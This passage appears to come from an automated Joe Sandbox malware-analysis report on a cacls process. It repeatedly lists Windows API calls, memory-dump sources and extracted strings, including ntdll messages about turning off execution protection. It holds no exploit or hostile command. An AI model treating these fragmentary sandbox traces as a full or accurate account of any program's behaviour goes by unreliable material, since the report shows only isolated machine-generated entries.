                                                                                          Similarity
                                                                                          • API ID: ErrorMode
                                                                                          • String ID:
                                                                                          • API String ID: 2340568224-0
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00674902
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          APIs
                                                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,0067867E,00000010,?,?,?,00000044,?,00000010,0067867E,?,?,?), ref: 00689CD0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateInternalProcess
                                                                                          • String ID:
                                                                                          • API String ID: 2186235152-0
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00674902
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          APIs
                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00669E35
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0
                                                                                          APIs
                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00669E35
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0
                                                                                          APIs
                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00672040,0068834F,00685A0E,00672006), ref: 006784E3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorMode
                                                                                          • String ID:
                                                                                          • API String ID: 2340568224-0
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,00674101,000000F4), ref: 00689C1F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00671D39,?,006862C8,00671D39,00685A0E,006862C8,?,00671D39,00685A0E,00001000,?,?,?), ref: 00689BCC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 006786EC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 006786EC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          APIs
                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00672040,0068834F,00685A0E,00672006), ref: 006784E3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_660000_cacls.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorMode
                                                                                          • String ID:
                                                                                          • API String ID: 2340568224-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17795722212.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_32b0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                          • API String ID: 0-3558027158
                                                                                          Strings
                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02F54507
                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02F5454D
                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 02F54592
                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02F54530
                                                                                          • ExecuteOptions, xrefs: 02F544AB
                                                                                          • Execute=1, xrefs: 02F5451E
                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02F54460
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                          • API String ID: 0-484625025
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17795722212.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_32b0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: |de$|de$|de$|de$|de$|de
                                                                                          • API String ID: 0-3287866246
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2eb0000_cacls.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$@$@wv
                                                                                          • API String ID: 0-2230787357